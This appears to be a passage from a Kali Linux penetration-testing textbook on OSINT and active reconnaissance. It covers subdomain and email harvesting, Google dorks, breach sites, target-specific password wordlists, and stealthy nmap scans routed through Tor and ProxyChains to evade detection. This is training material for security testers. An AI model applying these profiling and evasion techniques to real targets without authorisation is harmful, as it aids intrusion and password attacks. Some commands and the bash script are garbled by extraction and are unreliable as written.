Sublist3r is a Python-based tool that can be utilized during domain harvesting, which can enumerate sub-domains of a primary domain using OSINT. The tool utilizes APIs such as Google, Bing, Baidu, and ASK search engines. It also searches in NetCraft, Virustotal, ThreatCrowd, DNSdumpster, and reverseDNS; this also performs brute force using a specific wordlist.

The tool can be directly downloaded from GitHub, or by running git clone https://github.com/aboul3la/Sublist3r/ in the Kali Terminal.

Once the tool is downloaded, ensure you install the requirements and then run the tool to harvest the sub-domains of your target, as shown in the following screenshot:

root@kali:~/Sublist3r# ./sublist3r.py -d cyberhia.com



Coded By Ahmed Aboul-Ela - @aboul31a

[-] Enumerating subdomains now for cyberhia.com [-] Searching now in Baidu.. [-] Searching now in Yahoo.. [-] Searching now in Google .. [-] Searching now in Bing.. [-] Searching now in Ask.. [-] Searching now in Netcraft.. [-] Searching now in DNSdumpster ... [-] Searching now in Virustotal ... [-] Searching now in ThreatCrowd.. [-] Searching now in SSL Certificates.. [-] Searching now in PassiveDNS... [-] Total Unique Subdomains Found: 3 www.cyberhia.com blog.cyberhia.com demo.cyberhia.com

Maltego

Maltego is one of the most capable OSINT frameworks for personal and organizational reconnaissance. It is a GUI tool that provides the capability of gathering information on any individuals, by extracting the information that is publicly available on the internet by various methods. It is also capable of enumerating the DNS, brute-forcing the normal DNS and collecting the data from social media in an easily readable format.

How are we going to use the Maltego M4 in our goal-based penetration testing or red teaming exercise? We can utilize this tool in developing a visualization of data that we gathered. The community edition is shipped along with Kali Linux. The easiest way to access this application is to type maltegoce in the Terminal. The tasks in Maltego are named as transforms. Transforms come built into the tool and are defined as being scripts of code that execute specific tasks. There are also multiple plugins available in Maltego, such as the SensePost toolset, Shodan, VirusTotal, ThreatMiner, and so on.

The steps to use Matego for OSINT are as follows:

 In order to access Maltego, you will need to create an account with Paterva. This can be achieved by visiting https://www.paterva.com/web7/community/community/community.php and creating an account. Once the account is created and successfully logged in to the Maltego application, we should be able to see the following screenshot:



2. Upon clicking on Maltego CE (Free), you should be ready and all set as detailed next. That will enable us to utilize the community transforms. But, this is always limited to 12 entities.

Transform Hub is where the Maltego client allows users to easily install the transforms by different data providers, which have commercial and community transforms.

3. The next step is to log in to Maltego with your account; you must be able to see the following screenshot upon successful setup:

| | Configure Maltego | × |
|---|---|--------|
| STEPS 1. Login | READY: Your Maltego is now ready for use. | 8 |
| Login Result Install Transforms Help Improve Maltego Ready | ReadySetGO! Your new Maltego client has been initialized sucessfully! You can read the full User Guide https://docs.paterva.com/user-gui. You are now ready to use Maltego! Open a blank graph and let me play around Open an example graph Go away, I have done this before! | |
| | < <u>B</u> ack Next > <u>Finish</u> | Cancel |

4. Now click on Finish and you are ready to use Maltego and run the machine, by navigating to Machines in the Menu folder and clicking on Run Machine; and then, you will be able to start an instance of the Maltego engine.

The following screenshot provides the list of available options in

Maltego public machines:

| | Start a Machine | × |
|-------------------|--|---------------------------|
| STEPS | CHOOSE MACHINE: Please select to run from the list below. | the machine |
| 2. Choose machine | | _ |
| 2. Specify target | Company Stalker | [Domain] |
| | This machine will try to get all email | addresses at a domain th |
| | Find Wikipedia Edits | [Domain] |
| | This machine takes a domain and loo | ks for possible Wikipedia |
| | O Footprint L1 | [Domain] |
| | This performs a level 1 (fast, basic) fo | potprint of a domain. |
| | O Footprint L2 | [Domain] |
| | This performs a level 2 (mild) footprin | nt of a domain. |
| | | |
| | Please select a machine to run. | |
| | | |
| | < Back Next > | Finish Cancel |

Typically, when we select Maltego Public Servers, we will have the following machine selections:

- Company Stalker: To get all email addresses at a domain and then see which one resolves on social networks. It also downloads and extracts metadata of the published documents on the internet.
- Find Wikipedia edits: This transform looks for the alias from the Wikipedia edits and searches for the same across all social media platforms.

- Footprint L1: Performs basic footprints of a domain.
- Footprint L2: Performs medium-level footprints of a domain.
- Footprint L3: Intense deep dive into a domain, typically used with care since it eats up all the resources.
- Footprint XML: This works on the large targets such as a company hosting its own data centers, and tries to obtain the footprint by looking at **sender policy framework (SPF)** records hoping for netblocks, as well as reverse delegated DNS to their name servers.
- Person Email Address: To obtain someone's email address and see where it's used on the internet. Input is not a domain, but rather a full email address.
- Prune Leaf entries: Helps to filter the information by providing the options to delete certain parts of the network.
- Twitter digger X: Twitter tweets analyzer for aliases.
- Twitter digger Y: Twitter affiliations, finds the tweet, and extracts and analyzes it.
- Twitter Monitor: This can be utilized for performing operations to monitor Twitter for hashtags and named entities mentioned around a certain phrase. Input is a phrase.
- URL to Network and Domain Information: This transform will identify the domain information of other TLDs. For example, if you provide www.cyberhia.com, it will identify www.cyberhia.co.uk, cyberhia.co.in, and so on and so forth.

Attackers begin with Footprint L1 to have a basic understanding of the domain and its potentially available sub-domains and relevant IP addresses. It is fairly good to begin with this information as part of information gathering; however, attackers can also utilize all the other machines as mentioned previously to achieve their goal. Once the machine is selected, click on Next and specify a domain, for example, cyberhia.com. The following screenshot provides the overview of cyberhia.com:



Footprint of Cyberhia.com

OSRFramework

OSRFramework is a tool designed by i3visio in order to perform open source threat intelligence as a web interface, and with consoles as OSRFConsole. This tool can be installed directly through pip by running the pip install osrframework command.

OSRFramework provides threat intelligence about keywords in multiple sources, and also provides the flexibility to be a standalone tool, or a plugin to Maltego. There are three handy modules that come with OSRFramework, which can be utilized by penetration testers during an external threat intelligence data collection:

• usufy: This is used to search on multiple search engines, to identify the keywords in the URL, and to automatically enumerate and store all the results in .csv format. The following screenshot provides the output of cyberhia as a keyword to usufy:

| i3visio_uri | i3visio_alias | i3visio_platform |
|--|---------------|------------------|
| http://twicsy.com/u/cyberhia | cyberhia | Twicey |
| https://github.com/cyberhia | cyberhia | Github |
| https://www.freelancer.com/u/cyberhia.html | cyberhia | Freelancer |
| https://www.facebook.com/cyberhia | cyberhia | Fansbook |
| http://realcarders.us/member.php?username=cyberhia | cyberhia | Realcarders |
| http://twitter.com/cyberhia | cyberhia | Twitter |

usufy -n cyberhia

• searchfy: Search for the keyword in Facebook, GitHub, Instagram, Twitter, and YouTube. The following command can be used to query cyberhia as a keyword to searchfy:

searchfy -q "cyberhia"
• mailfy: Identify the keyword and add the email domains to the end of the keyword, and automatically search in haveibeenpawned.com with an API call:

mailfy -n cyberhia

Web archives

What is deleted from the internet is not necessarily deleted from Google. Every page that is visited by Google is backed up as a snapshot in Google's cache servers. Typically, it is intended to see whether Google can serve you the best available page based on your search query. The same can be utilized to gather information about our target. For example, say a hacked database's details were posted in sampledatadumpwebsite.com, and that website or the link is taken off the internet. If the page is accessed by Google, this information serves the attackers a lot of information such as usernames, password hashes, what type of backend was being utilized, and other relevant technological and policy information. The following link is the first level of harvesting past data: https://web.archive.org/web/.

Here is a screenshot of cyberhia.com in the WayBack Machine as of 24 March, 2017:



We will be discussing more about the hidden face of Google in the coming section, *Google Hacking Database*.

Scraping

A technique that attackers utilize to extract large number of datasets from websites, whereby the extracted data is stored locally in a filesystem, is called scraping or web scraping. In the following section, we will utilize some of the most used tools in Kali Linux to perform scraping.

Gathering usernames and email addresses

The theHarvester tool is a Python script that searches through popular search engines and other sites for email addresses, hosts, and sub-domains.

Using theHarvester is relatively simple, as there are only a few command switches to set. The options available are as follows:

- -d: This identifies the domain to be searched; usually the domain or target's website.
- -b: This identifies the source for extracting the data; it must be one of the following: Bing, BingAPI, Google, Google-Profiles, Jigsaw, LinkedIn, People123, PGP, OT All.
- -1: This limiting option instructs theHarvester to only harvest data from a specified number of returned search results.
- -f: This option is used to save the final results to an HTML and an XML file. If this option is omitted, the results will be displayed on the screen, and not saved.

The following screenshot provides the sample data extract from theHarvester for the packtpub.com domain:

| ons 👻 🛛 Pl | aces 🕶 | 🖸 Terminal 🕶 | | Sun 16: | 35 | | |
|-----------------------|---------------------------|---|---|----------------------------------|--------------|------|-------|
| File Edit | View | Search Terminal H | root@kali: - | | 0 | 0 | 0 |
| root@kali | :~# T | heharvester -d pa | acktpub.com -l 100 -b goo | gle -h resultsi | .html | | ^ |
| Warning: when fuzz | Pycur zing S | l is not compiled SL sites. Check W | d against Openssl. Wfuzz wfuzz's documentation for | might not work more informati | corre on. | ctly | / |
| ++++++ | +++++ | ******* | ****** | ********** | | | |
| | | | | 27 | | | |
| * TheHarv | vester | Ver. 2.7.2 | | | | | |
| * Coded b | by Chr | istian Martorella | a). | | | | |
| * Edge-Se | ecurity relia® | y Research | | | | | |
| ***** | +++++ | ++++++++++++++++++++++++++++++++++++++ | | ****** | | | |
| [-] Start | ting h | arvesting process | s for domain: packtpub.co | in i | | | |
| [-] Searc | ching Search Search | In Google: ing 0 results Ing 100 results. | | | | | |
| Harvesti | ing re | sults | | | | | |
| [+] Email | ls fou | nd: | | | | | |
| customero | areilo | acktpub.com | | | | | |
| | and a color | Contraction of the second | | | | | - C |

Obtaining user information

Many penetration testers gather usernames and email addresses, as this information is frequently used to log on to targeted systems.

The most commonly employed tool is the web browser, which is used to manually search the target organization's website as well as third-party sites such as LinkedIn or other social networking websites.

Some automated tools included with Kali can supplement the manual searches.



Email addresses of former employees can still be of use. When conducting social engineering attacks, directing information requests to a former employee usually results in a redirect that gives the attacker the credibility of having dealt with the previous employee. In addition, many organizations do not properly terminate employee accounts, and it is possible that these credentials may still give access to the target system.

Shodan and censys.io

Where can you find an ocean of vulnerable hosts? Often, attackers utilize existing vulnerabilities to gain access to the system without much effort, so one of the easiest ways to do so is to search in Shodan. Shodan is one of the most important search engines, as it lets anyone on the internet find devices connected to the internet using a variety of filters. It can be accessed by visiting https://www.shodan.io/. This is one of the most popular websites consulted for information around the globe. If the name of a company is searched for, it will provide any relevant information that it has in its database, such as IP addresses, port numbers, and the service that was running.

The following sample screenshot from shodan.io shows hosts that are running IIS 5.0, which enables attackers to go ahead and narrow down the target and move laterally, which we will be learning about in the coming chapters:



Similar to Shodan, attackers now can also utilize the scans.io API for relevant information gathering, or censys.io, which can provide more information about IPv4 hosts, websites, certifications, and other stored information. The following

screenshot provides information about packtpub.com:



Google Hacking Database

Lately, Google is the way in which people keep themselves updated; "Google it" are the common words used to refer to searching for anything that is unknown, or to gather relevant information on the topic in question. In this section, we will narrow down how penetration testers can utilize Google through dorks.

What is a dork ?

Dork is used for a person who is socially inept or socially awkward, or someone who doesn't care about anything in practice.

Using dork scripts to query Google

The first step to understanding Google Hacking Database is that the testers must understand all the advanced Google operators, just like how machine-level programming engineers must understand computer OP codes. These Google operators are part of the Google query process, and the syntax of searching is as follows:

```
operator:itemthatyouwanttosearch
```

There is no space between operator, the colon (:), and itemthatyouwanttosearch. The following table lists all the advanced Google operators:

| Operator | Description | Mixes with other operators? | Can be used alone? |
|------------|---|-----------------------------|--------------------------|
| intitle | Page title keyword search | Yes | Yes |
| allintitle | All keywords search at a time in the title | No | Yes |
| inurl | Search the keyword in the URL | Yes | Yes |
| site | Filter Google search results only to the site | Yes | Yes |
| ext OT | | | |

| filetype | Search for particular extension or file type | Yes | No |
|-----------|---|-----|-----|
| allintext | Keyword search for all number of occurrences | No | Yes |
| link | External link search on a page | No | Yes |
| inanchor | Search anchor link on a web page | Yes | Yes |
| numrange | Limit search on the range | Yes | Yes |
| daterange | Limit search on the date | Yes | Yes |
| author | Finding group author | Yes | Yes |
| group | Searching group names | Yes | Yes |
| related | Search related keywords | Yes | Yes |

The following screenshot provides a simple Google dork to search for the username in a log file.





For more specific operators, we can refer to the guide from Google at http://www.g oogleguide.com/advanced_operators_reference.html, and we can utilize the Google hacking database from exploit-db, which is constantly updated by the security research community, available at https://www.exploit-db.com/google-hacking-database/.

Data dump sites

In today's world, any information can be shared online quickly and more effectively with the birth of "*the on-spot apps*" such as pastebin.com. However, this turns out to be one of the major drawbacks when developers store the source code, crypto keys, and other confidential information of the app, and leave it unattended; this online information serves attackers a list of abundant information to formulate more focused attacks.

The archive forums also reveal the logs of a particular website or the past hacking incidents, if it was previously hacked. Pastebin offers this information. The following screenshot provides the list of confidential information about a target:



Using scripts to automatically gather OSINT data

In the field of information security research, it is always about the time that we can save when gathering information that can yield more focus on vulnerability research and exploitation. In this section, we will focus more on how to automate OSINT to make passive reconnaissance more effective:

```
#!/bin/bash
echo "Enter target domain: " read domain if [[ $domain != "" ]];
then
echo "Target domain set to $domain"
echo "*
                             +++++++++++++
echo "The Harvestor" theharvester -d $domain -l 500 -b all -f harvester_$domain echo "dc
echo "Whois Details" whois $domain >> whois_$domain
echo "done!"
echo "********
            ***********************************
echo "Searching for txt files on $domain using Goofile..." goofile -d $domain -f txt >>
echo "done!"
echo "Searching for pdf files on $domain using Goofile..." goofile -d $domain -f pdf >>
echo "done!"
echo "Searching for pdf files on $domain using Goofile..." goofile -d $domain -f doc >>
echo "done!"
echo "Searching for pdf files on $domain using Goofile..." goofile -d $domain -f xls >>
echo "done!" else echo "Error! Please enter a domain... "
fi
```

The previous script can be further used with a looping one-line script to run on multiple domains, by using the following line as and when required:

while read r; do scriptname.sh \$r; done < listofdomains

The preceding automation is a very simple script to make use of some of the command-line tools in Kali, and store the output in multiple files without a database. However, attackers can make use of similar scripts to automate the majority of the command-line tools to harvest most of the information.

Defensive OSINT

Defensive OSINT is typically used to see what is already on internet including breached information and see whether that information is valuable during the penetration testing activity. If the goal of penetration testing is to demonstrate the real-world scenario where this data can be handy, the first step is to identify a similar target that has already been breached. The majority of organizations fix only the affected platform or the host, and often they forget about other similar environments. The defensive OSINT is largely divided into three places of search.

Dark web

The dark web is the encrypted network that exists between Tor servers and their clients, whereas the deep web is simply the content of databases and other web services that for one reason or another cannot be indexed by conventional search engines such as Google.

Let's take an example of expired drugs or banned drugs that can be sold on the dark web, where users can purchase them for multiple reasons. We will explore how to identify information on the dark web using the Tor browser. Some websites such as deepdotweb.com provide a market list of hidden deep web links. These links can only be accessed through the Tor browser. The following screenshot provides an example of drugs that are being sold on the Dream Market:



Security breaches

A security breach is any incident that results in unauthorized access of data, applications, services, networks, and/or devices by bypassing their underlying security mechanisms.

Hackers are known to visit https://databases.today and https://haveibeenpwned.com. These websites have an archive of breached data. The following screenshot provides the view of the databases.today website:



To harvest more information about the target, pentesters would typically look into websites such as zone-h.com to provide information about breaches to it. For example, defacement of sidehustlewarrior.com was performed by an underground group named Bangladesh Grey Hat Hackers. The following screenshot provides details on the IP address, web server, and operating system used during the defacement:



Threat intelligence

Threat intelligence is controlled, calculated, and refined information about potential or current attacks that threaten an organization. The primary purpose of this kind of intelligence is to ensure organizations are aware of the current risks, such as **Advanced Persistent Threats** (**APTs**), zero-day exploits, and other severe external threats. For example, if credit card information was stolen from Company A through APTs, Company B could be alerted to this threat intelligence and adjust their security accordingly.

But, it is most likely that organizations will take a very long time to make a decision due to lack of trusted sources, and also the spending involved due to the nature and probability of the threats. In the preceding example, Company B, may have 2,000 stores to replace, or have to halt all transactions.

This information can be potentially utilized by attackers to exploit the network. However, this information is considered part of the passive reconnaissance activity, since there is no direct attack launched on the target yet.

Penetration testers or attackers will always subscribe to these kinds of open source threat intelligence frameworks, such as STIX and TAXII, or utilize, GOSINT framework for **indicators of compromise (IOCs**)

Profiling users for password lists

So far, you have learned how to use passive reconnaissance to collect names and biographical information for users of the target being tested; this is the same process used by hackers. The next step is to use this information to create password lists specific to the users and the target.

Lists of commonly used passwords are available for download, and are stored locally on Kali in the /usr/share/wordlists directory. These lists reflect the choices of a large population of users, and it can be time consuming for an application to attempt to use each possible password before moving on to the next password in the queue.

Fortunately, **Common User Password Profiler (CUPP)** allows the tester to generate a wordlist that is specific to a particular user. CUPP was present on Backtrack 5r3; however, it will have to be downloaded for use on Kali. To obtain CUPP, enter the following command:

```
git clone https://github.com/Mebus/cupp.git
```

This will download CUPP to the local directory.

CUPP is a Python script, and can be simply invoked from the CUPP directory by entering the following command:

```
root@kali:~# python cupp.py -i
```

This will launch CUPP in interactive mode, which prompts the user for specific elements of information to use in creating wordlists. An example is shown in the following screenshot:



When the interactive mode has completed creating a wordlist, it is placed in the ^{cupp} directory.

Creating custom wordlists for cracking passwords

There are multiple tools that are readily available in Kali Linux to create custom a wordlist for cracking passwords offline. We will now take a look at a couple of them.

Using CeWL to map a website

CeWL is a Ruby app that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be used for password crackers such as John the Ripper.

The following screenshot provides the custom list of words generated from the cyberhia.com index page:



Extracting words from Twitter using twofi

While we can profile a user utilizing social media platforms such as Facebook, Twitter, LinkedIn, and so on, we can also use twofi, which stands for **Twitter words of interest**. This tool is written in Ruby script and utilizes the Twitter API to generate a custom list of words that can be utilized for offline password cracking.

In order to use twofi, we must have a valid Twitter API key and API secret. The following screenshot shows how to utilize twofi during passive reconnaissance to form our custom password wordlist; in the following example, we run twofi -m 6 -u @PacktPub > filename, which generates a list of custom words that were posted by the @PacktPub Twitter handle. twofi will be more powerful during an individual targeted attack:



Summary

The first baby step in the attack process or kill chain is to conduct information harvesting, or reconnaissance, to identify the right information on the target with the use of OSINT. Passive reconnaissance provides a real-time view of an attacker's eye on a company. This is a stealthy assessment; the IP address or activities of an attacker are almost indistinguishable from normal business as usual. The same information is extremely fruitful during social engineering types of attacks, or facilitating other attacks. We have now built our own custom script to save time, and performed passive reconnaissance using both offensive and defensive OSINT.

In the next chapter, we will be learning the different types of reconnaissance in an active sense, and make use of the data that we harvested using OSINT. Although active reconnaissance techniques will provide more information, there is always an increase in the risk of detection. Therefore, the emphasis will be on advanced stealth techniques.

Active Reconnaissance of External and Internal Networks

The main goal of the active reconnaissance phase is to collect and weaponize information about the target as much as possible in order to facilitate the exploitation phase of the kill chain methodology.

We have seen in the last chapter how to perform passive reconnaissance using OSINT, which is almost undetectable and can yield a significant amount of information about the target organization and its users.

Active reconnaissance builds on the results of OSINT and passive reconnaissance and emphasizes more focused probes to identify the path to the target and the exposed attack surface of the target. In general, complex systems have a greater attack surface, and each surface may be exploited and then leveraged to support additional attacks.

Although active reconnaissance produces more useful information, interactions with the target system may be logged, triggering alarms by protective devices, such as firewalls, **Intrusion Detection Systems (IDS)**, and **Intrusion Prevention Systems (IPS)**. As the usefulness of the data to the attacker increases, so does the risk of detection; this is shown in the following diagram:



To improve the effectiveness of active reconnaissance in providing detailed information, our focus will be on using stealthy, or difficult to detect, techniques.

In this chapter, you will learn about the following:

- Stealth scanning strategies
- External and internal infrastructure, host discovery, and enumeration
- Comprehensive reconnaissance of applications, especially recon-ng
- Enumeration of internal hosts using DHCP
- Useful Microsoft Windows commands during penetration testing
- Taking advantage of default configurations
- Enumeration of users using SNMP, SMB, and <code>rpcclient</code>

Stealth scanning strategies

The greatest risk of active reconnaissance is the discovery by the target. Using the tester's time and data stamps, the source IP address, and additional information, the target can identify the source of the incoming reconnaissance. Therefore, stealth techniques are employed to minimize the chances of detection.

When employing stealth to support reconnaissance, a tester mimicking the actions of a hacker will do the following:

- Camouflage tool signatures to avoid detection and triggering an alarm
- Hide the attack within legitimate traffic
- Modify the attack to hide the source and type of traffic
- Make the attack invisible using nonstandard traffic types or encryption

Stealth scanning techniques can include some or all of the following:

- Adjusting source IP stack and tool identification settings
- Modifying packet parameters (nmap)
- Using proxies with anonymity networks (ProxyChains and the Tor network)

Adjusting source IP stack and tool identification settings

Before the penetration tester (or the attacker) begins testing, we must ensure that all unnecessary services on Kali are disabled or turned off.

For example, if the local DHCP daemon is enabled and is not required, it is possible for the DHCP to interact with the target system, which could be logged and send alarms to the target's administrators.

Some commercial and open source tools (for example, the Metasploit framework) tag their packets with an identifying sequence. Although this can be useful in post-test analysis of a system's event logs (where events initiated by a particular testing tool can be directly compared to a system's event logs to determine how the network detected and responded to the attack), it can also trigger certain intrusion detection systems. Test your tools against a lab system to determine the packets that are tagged, and either change the tag or use the tool with caution.

The easiest way to identify tagging is to apply the tool against a newly-created virtual image as the target and review system logs for the tool's name. In addition, use Wireshark to capture traffic between the attacker and target virtual machines, and then search the **packet capture** (**pcap**) files for any keywords that can be attributed to the testing tool (name of the tool, vendor, license number, and so on).

useragent in the Metasploit framework can be changed by modifying the http_form_field option. From the msfconsole prompt, select the option to use auxiliary/fuzzers/http/http_form_field and then set a new useragent header, as shown in the following screenshot:

```
msf > use auxiliary/fuzzers/http/http_form_field
msf_auxiliary(fuzzers/http/http_form_field) > set useragent
useragent => Mozilla/4.0 (compatible: MSIE 6.0: Windows NT 5.1)
msf_auxiliary(fuzzers/http/http_form_field) > set useragent Googlebot-Image/1.0
useragent => Googlebot-Image/1.0
```

In this example, useragent was set to be Google's indexing spider, Googlebot-Image. This is a common automated application that visits and indexes websites and rarely attracts attention from the website's owner.



To identify legitimate useragent headers, refer to the examples at: http://www.useragentstring.com/.

Modifying packet parameters

The most common approach to active reconnaissance is to conduct a scan against the target, send defined packets to the target, and then use the returned packets to gain information. The most popular tool of this type is **Network Mapper (nmap)**.

To use nmap effectively, it must be run with root-level privileges. This is typical of applications that manipulate packets, which is why Kali defaults to root at the time of startup.

When attempting to minimize detection, some stealth techniques to avoid detection and subsequent alarms include the following:

- Attackers approach the target with a goal in mind and send the minimum number of packets needed to determine the objective. For example, if you wish to confirm the presence of a web host, you first need to determine whether port 80, the default port for web-based services, is open.
- Avoid scans that may connect with the target system and leak data. Do not ping the target or use **synchronize** (**SYN**) and non-conventional packet scans, such as **acknowledge** (**ACK**), **finished** (**FIN**), and **reset** (**RST**) packets.
- Randomize or spoof packet settings, such as the source IP and port address, and the MAC address.
- Adjust the timing to slow the arrival of packets at the target site.
- Change the packet size by fragmenting packets or appending random data to confuse packet inspection devices.

For example, if you want to conduct a stealthy scan and minimize detection, the following nmap command could be used:

nmap --spoof-mac Cisco --data-length 24 -T paranoid --max-hostgroup 1 --max-parallelis

The following table explains the previous command in detail:

| Command | Rationale |
|---------|-----------|
| | |

| spoof-mac-Cisco | This spoofs the MAC address to match a Cisco product. Replacing cisco with o will create a completely random MAC address. |
|---------------------------|---|
| data-length 24 | This appends 24 random bytes to most packets that are sent. |
| -T paranoid | This sets the time to the slowest setting: paranoid. |
| max-hostgroup | Limits the hosts that are scanned at a time. |
| max-parallelism | Limits the number of outstanding probes that are sent out. You can also use thescan-delay option to set a pause between the probes; however, this option is not compatible with themax_parallelism option. |
| -pn | This doesn't ping to identify active systems (this can leak data). |
| -f | This fragments the packets; this will frequently fool low-end and improperly configured IDs. |
| -D 10.1.20.5, RND:5,ME | This creates decoy scans to run simultaneously with the attacker's scans; this hides the actual attack. |
| - n | No DNS resolution: internal or external DNS servers are not actively queried by nmap for DNS information. |

| | Such queries are frequently logged, so the query function should be disabled. |
|------------------------------|---|
| - sS | This conducts a stealth TCP SYN scan, which does not complete the TCP handshake. Other scan types (for example, null scans) can also be used; however, most of these will trigger detection devices. |
| -sV | This enables version detection. |
| -oA /desktop/pentest/nmap | This outputs the results to all formats (normal, greppable, and XML). |
| -р Т:1-1024 | This specifies the TCP ports to be scanned. |
| random-hosts | This randomizes the target host order. |

Together, these options will create a very slow scan that hides the true identity of the source. However, if the packets are too unusual, complex modification may actually attract the attention of the target; therefore, many testers and attackers use anonymity networks to minimize detection.

Using proxies with anonymity networks

In this section, we will be exploring the two important tools that are utilized by the attackers to maintain anonymity on the network. We will be focusing on Tor and Privoxy in this section.

Tor (www.torproject.org) is an open source implementation of the third-generation onion routing that provides free access to an anonymous proxy network. Onion routing enables online anonymity by encrypting user traffic and then transmitting it through a series of onion routers. At each router, a layer of encryption is removed to obtain routing information, and the message is then transmitted to the next node. It has been likened to the process of gradually peeling an onion, hence the name. It protects against traffic analysis attacks by guarding the source and destination of a user's IP traffic.

In this example, Tor will be used with Privoxy, a noncaching web proxy that *sits* in the middle of an application that communicates with the internet and uses advanced filtering to ensure privacy and remove ads and potentially hostile data being sent to the tester.

To install Tor, perform the following steps:

- 1. Issue the apt-get update and apt-get upgrade commands, and then use the following command:
- apt-get install tor
- 2. Once Tor is installed, edit the proxychains.conf file located in the /etc directory. This file dictates the number and order of proxies that the test system will use on the way to the Tor network. Proxy servers may be down, or they may be experiencing a heavy load (causing slow or latent connections); if this occurs, a defined or strict ProxyChain will fail because an expected link is missing. Therefore, disable the use of strict_chain and enable dynamic_chain, which ensures that the connection will be routed, as shown in the following screenshot:


3. Edit the [ProxyList] section to ensure that the socks5 proxy is present, as shown in the following screenshot:



Open proxies can be easily found online (an example would be https://www .proxynova.com/proxy-server-list/) and added to the proxychains.conf file. Testers can take advantage of this to further obfuscate their identity. For example, if there are reports that a certain country or block of IP addresses has been responsible for recent online attacks, look for open proxies from that location and add them to your list or a separate configuration file.

4. To start the Tor service from a Terminal window, enter the following command:

service tor start

- 5. Verify that Tor has started by using the following command:
- # service tor status

It is important to verify that the Tor network is working and providing anonymous connectivity.

- 6. Verify your source IP address first. From a Terminal, enter the following command:
- # firefox www.whatismyip.com

This will start the Iceweasel browser and open it to a site that provides the source IP address connected with that web page.

- 7. Note the IP address, and then invoke Tor routing using the following ProxyChains command:
- # proxychains firefox www.whatismyip.com

In this particular instance, the IP address was identified as xx.xx.xx. A whois lookup of that IP address from a Terminal window indicates that the transmission is now exiting from a Tor exit node, as shown in the following screenshot:

| NetRange: | 96 | | .23 | - 1 |
|------------|--------|----------------|----------------------------------|------|
| CIDR: | 91 | 16/29 | | - 1 |
| OriginAS: | | | | |
| NetName: | TOR-MI | A01 | | |
| NetHandle: | NET-96 | -47-226-16-1 | | |
| Parent: | NET-96 | -47-224-0-1 | | |
| NetType: | Reallo | cated | | |
| Comment: | ====== | | | |
| Comment: | This i | s a Tor Exit I | Node operated on behalf of the T | or |
| Comment: | Projec | t. Tor helps | you defend against network | 1000 |
| Comment: | survei | llance that th | hreatens personal freedom and | |
| Comment: | privac | y. You can lea | arn more now at www.torproject.c | org |
| Comment: | ====== | | | |



You can also verify that Tor is functioning properly by accessing: https://check.torproject.org.

Although communications are now protected using the Tor network, it is possible for a DNS leak to occur, which occurs when your system makes a DNS request to provide your identity to an ISP. You can check for DNS leaks at: www.dn sleaktest.com.

Most command lines can be run from the console using proxychains to access the Tor network.

When using Tor, some considerations to be kept in mind are as follows:

- Tor provides an anonymizing service, but it does not guarantee privacy. Owners of the exit nodes are able to sniff traffic and may be able to access user credentials.
- Vulnerabilities in the Tor browser bundle have reportedly been used by law enforcement to exploit systems and gain user information.
- ProxyChains do not handle **UDP** (**User Datagram Protocol**) traffic.
- Some applications and services cannot run over this environment—in particular, Metasploit and nmap may break. The stealth SYN scan of nmap breaks out of ProxyChains and the connect scan is invoked instead; this can leak information to the target.
- Some browser applications (ActiveX, Adobe's PDF applications, Flash, Java, RealPlay, and QuickTime) can be used to obtain your IP address.
- Attackers can also use random chaining. With this option, ProxyChains will randomly choose IP addresses from the our list (local Ethernet IP, for example, 127.0.0.1, 192.168.x.x Or 172.16.x.x) and use them for creating our ProxyChain. This means that each time we use ProxyChains, the chain of proxies will look different to the target, making it harder to track our traffic from its source.
- To do so, in a similar fashion, edit the /etc/proxychains.conf file and comment out dynamic chains and uncomment random_chain, since we can only use one of these options at a time.
- In addition, attackers can uncomment the line with chain_len, which will then determine the number of IP address in the chain while creating a random proxy chain.

This technique can be engaged by attackers to establish a qualified anonymity and then remain anonymous over the network.

The Tor-Buddy script allows you to control how frequently the Tor IP address is refreshed,



www automatically making it more difficult to identify the user's information. To access Tor-Buddy, you can visit http://sourceforge.net/projects/linuxscripts/files/Tor-Buddy/.

DNS reconnaissance and route mapping

Once a tester has identified the targets that have an online presence and contain items of interest, the next step is to identify the IP addresses and routes to the target.

DNS reconnaissance is concerned with identifying who owns a particular domain or series of IP addresses (the sort of information gained with whois although this has been completely changed with the **General Data Protection Regulation (GDPR)** enforcement across Europe from May 2018), the DNS information defining the actual domain names and IP addresses assigned to the target and the route between the penetration tester or the attacker and the final target.

This information gathering is semi-active—some of the information is available from freely available open sources such as DNSstuff.com, while other information is available from third parties such as DNS registrars. Although the registrar may collect IP addresses and data concerning requests made by the attacker, it is rarely provided to the end target. The information that could be directly monitored by the target, such as DNS server logs, is almost never reviewed or retained.

Because the information needed can be queried using a defined systematic and methodical approach, its collection can be automated.



Note that DNS information may contain stale or incorrect entries. To minimize inaccurate information, query different source servers and use different tools to cross-validate results. Review results and manually verify any suspect findings.

The whois command (Post GDPR)

The whois command used to be the first step in identifying an IP address for many years until GDPR was enforced. Formerly, the whois command was used to to query databases that store information on the registered users of an internet resource, such as a domain name or IP address. Depending on the database that is queried, the response to a whois request will provide names, physical addresses, phone numbers, and email addresses (useful in facilitating social engineering attacks), as well as IP addresses and DNS server names. After 25th May 2018, there are no registrant details provided; however, attackers can understand which whois server responds and it retrieves domain data that includes availability, ownership, creation, expiration details, and name servers.

The following screenshot shows the whois command run against the domain of cyberhia.com:

root@kali:~# whois cyberhia.com Domain Name: CYBERHIA.COM Registry Domain ID: 1954580299 DOMAIN COM-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2018-07-28T11:48:19Z Creation Date: 2015-08-22T04:14:35Z Registry Expiry Date: 2018-08-22T04:14:35Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: 480-624-2505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhi bited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibi ted Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferP rohibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhi bited Name Server: NS17.DOMAINCONTROL.COM Name Server: NS18.DOMAINCONTROL.COM DNSSEC: unsigned

Employing comprehensive reconnaissance applications

Although Kali contains multiple tools to facilitate reconnaissance, many of the tools contain features that overlap, and importing data from one tool into another is usually a complex manual process. Most testers select a subset of tools and invoke them with a script.

